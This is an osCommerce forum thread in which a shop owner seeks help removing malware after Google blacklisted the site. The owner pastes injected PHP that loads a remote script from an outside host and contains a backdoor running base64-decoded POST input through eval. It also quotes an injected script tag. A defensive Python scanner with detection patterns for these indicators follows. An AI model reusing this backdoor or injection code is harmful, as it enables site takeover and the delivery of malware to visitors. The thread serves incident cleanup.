labmais, Posted November 7, 2011:
Hello, my website has been classified as a malware website since one or two weeks ago: http://estereomicroscopio.com.br/ I tried to clean it in many ways. Does anyone know what can be done to solve it?

ANOTHER QUESTION: When I go into some category, I get a link like this: http://estereomicroscopio.com.br/catalogo/banho-maria-c-64.html The question is: how is this link generated? I checked my files but there is no such .html file. Is it stored anywhere?
MrPhil, Posted November 7, 2011:
You have some sort of "SEO" add-on/mod installed that generates URLs that look like that. There are no ".html" files in osC, so stop looking for them. Everything is generated by PHP, with a fake name of .html for SEO purposes (hides the underlying technology).

As far as cleaning up your site from the malware infection, it's obvious that you're missing something, as you don't understand anything about how your site works. Look around for posts explaining the ways that sites can be secured, and how to clean them up once infected. I seem to recall that "germ" and "Dunweb" have posted on this subject many times, so you might start by searching for their postings.
labmais (author), Posted November 7, 2011:
Thanks for the answer, Phil. I'm asking to know where I can see the supposed .html file, because I received a report saying that this URL is infected: http://estereomicroscopio.com.br/catalogo/estufas-c-63.html If I can check this URL's code, I can get rid of the infection. Is what I'm looking for inside the DB?
Guest, Posted November 7, 2011:
Rafael, you have to check ALL of the files in your osCommerce installation and remove ALL malicious code and anomalous files. As Phil stated, there are NO HTML files in osCommerce.
Chris
labmais (author), Posted November 7, 2011:
I see, Chris, and I'm grateful for your help. I received a report from Google.

GOOGLE REPORT
URL: http://estereomicros...tufas-c-63.html
Last checked: November 3, 2011
Suspected injected code / Instances: <script src=http://infocenc.com.br/js/>

It says that there is malicious code on it, right? How can I fix this specific reported URL? About checking all files... there is no problem doing that, but how can I do it? If I check all the files, what do I need to look for?
Guest, Posted November 7, 2011:
Rafael, check all of your files for this: <script src=http://infocenc.com.br/js/> OR a base64 script line. Once your site has been cleaned and secured, you can then contact Google to remove your site from the blacklist.
Chris
labmais (author), Posted November 7, 2011:
Two things:

1st: I have already checked all files and all DB tables for the mentioned script. I found only one result, and it was inside the DB, more specifically in the configuration table.

2nd: I really have seen a base64 script, but it seemed to be OK and I didn't touch it. So is the base64 bad code? The report mentioned this URL too as damaging inside my website: drcutrapalis.orge.pl

base64 code:

    <?php
    global $sessdt_o;
    if(!$sessdt_o) {
        $sessdt_o = 1;
        $sessdt_k = "lb11";
        // first visit: set a marker cookie (via header, or via JS if output already started)
        if(!@$_COOKIE[$sessdt_k]) {
            $sessdt_f = "102";
            if(!@headers_sent()) {
                @setcookie($sessdt_k,$sessdt_f);
            } else {
                echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>";
            }
        } else {
            // second visit: replace the marker and inject a remote script plus a refresh
            if($_COOKIE[$sessdt_k]=="102") {
                $sessdt_f = (rand(1000,9000)+1);
                if(!@headers_sent()) {
                    @setcookie($sessdt_k,$sessdt_f);
                } else {
                    echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>";
                }
                $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"];
                $sessdt_v = urlencode(strrev($sessdt_j));
                $sessdt_u = "http://turnitupnow.net/?rnd=".$sessdt_f.substr($sessdt_v,-200);
                echo "<script src='$sessdt_u'></script>";
                echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--";
            }
        }
        // backdoor: evaluates base64-decoded PHP supplied in a POST field
        $sessdt_p = "showimg";
        if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));exit;}
    }
    #/* header("Location:catalogo/"); #*/
    function decode_pwd($pwd) {
        $pwd = preg_replace("/TmE=|Q2w=/","",base64_decode($pwd));
        return base64_decode($pwd);
    }
    $config = file("config.txt");
    foreach($config as $key => $value) {
        $config[$key] = trim($value);
    }
    $title = $config[0];
    $keywords = $config[1];
    $description = $config[2];
    $catalog = $config[3];
    $addr = $config[4];
    $server_addr = $config[5];
    $server_user = $config[6];
    $server_pass = decode_pwd($config[7]);
    $server_db = $config[8];
    ?>
MrPhil, Posted November 7, 2011:
If it's not in the base osC code, then yes, it's bad. I don't have the code available to compare against right now, but the code you listed above certainly doesn't look like it belongs in osC. After removing it, you've only begun the battle. You have to figure out how the hacker might have gotten in and planted that code, and then seal up all the holes in your site. Germ and DunWeb have posted a lot on that section, so go looking there.
labmais (author), Posted November 7, 2011:
OK, I will. Only one last question: should all base64 code be deleted? I will do another search on my files. I guess that the "hacker" could have gotten in through an "open door" in the image upload system.
Guest, Posted November 7, 2011:
Rafael, not necessarily; there are some instances (especially with payment modules) where the base64 function is used to hide information for security reasons.
Chris
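A scanner along the lines of Chris's advice in the two posts above, added here as an example (it is not code from this thread or from osCommerce): it walks a directory tree, which can be the site's docroot or a folder holding a SQL dump of the configuration table, and flags the injected script tag and the eval-of-base64 backdoor form, while leaving a payment module's plain base64_encode call alone. All file names and contents below are constructed samples.

```python
import os
import re
import tempfile

# Indicators from this thread: the exact tag Google reported and the eval-of-base64
# backdoor form in the posted PHP. A bare base64_encode/base64_decode call is not
# flagged, since payment modules use base64 legitimately (see Chris's post above).
INDICATORS = {
    "injected_script_tag": re.compile(r"<script\s+src=['\"]?https?://infocenc\.com\.br/js/", re.I),
    "eval_base64_backdoor": re.compile(r"eval\s*\(\s*base64_decode\s*\(", re.I),
    "post_triggered_eval": re.compile(r"eval\s*\([^;]*\$_(POST|GET|REQUEST|COOKIE)\[", re.I),
}

def scan_text(text):
    """Return the set of indicator names matched in one file's contents."""
    return {name for name, rx in INDICATORS.items() if rx.search(text)}

def scan_tree(root):
    """Walk root (docroot or dump folder); return {relative path: sorted indicators}."""
    hits = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            path = os.path.join(dirpath, fn)
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                found = scan_text(fh.read())
            if found:
                hits[os.path.relpath(path, root).replace(os.sep, "/")] = sorted(found)
    return hits

# Constructed sample tree (hypothetical names, not real site files): a clean payment
# module using base64, a backdoored include, and a dump of the configuration table.
SAMPLE_FILES = {
    "includes/modules/payment/clean.php":
        "<?php $sig = base64_encode(hash_hmac('sha1', $data, $key, true)); ?>",
    "includes/application_top.php":
        "<?php if(isset($_POST['showimg'])){eval(base64_decode(str_replace(chr(32),chr(43),"
        "$_POST['showimg'])));exit;} ?>",
    "backup/configuration.sql":
        "INSERT INTO configuration VALUES (1,'Store Name','STORE_NAME',"
        "'<script src=http://infocenc.com.br/js/>',1,NULL,NULL,NULL);",
}

def build_sample_tree():
    root = tempfile.mkdtemp()
    for rel, body in SAMPLE_FILES.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root
```

Run `scan_tree("/path/to/docroot")` against a real install; every flagged path still needs a manual diff against a clean osC copy, as MrPhil says, since a pattern match is a lead and not proof.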
labmais (author), Posted November 7, 2011:
OK, I get it, I have to be careful... What about the specific code that I showed? Is it bad or good code? Thanks
Taipo, Posted November 7, 2011:
Once you have cleaned out your site, have a quick look at this page: http://www.oscommerce.com/forums/topic/375288-updated-security-thread/ There are a number of recommendations in there that will help you not get reinfected again.
thieule, Posted December 9, 2011:
You can remove it in the database, in the table configuration.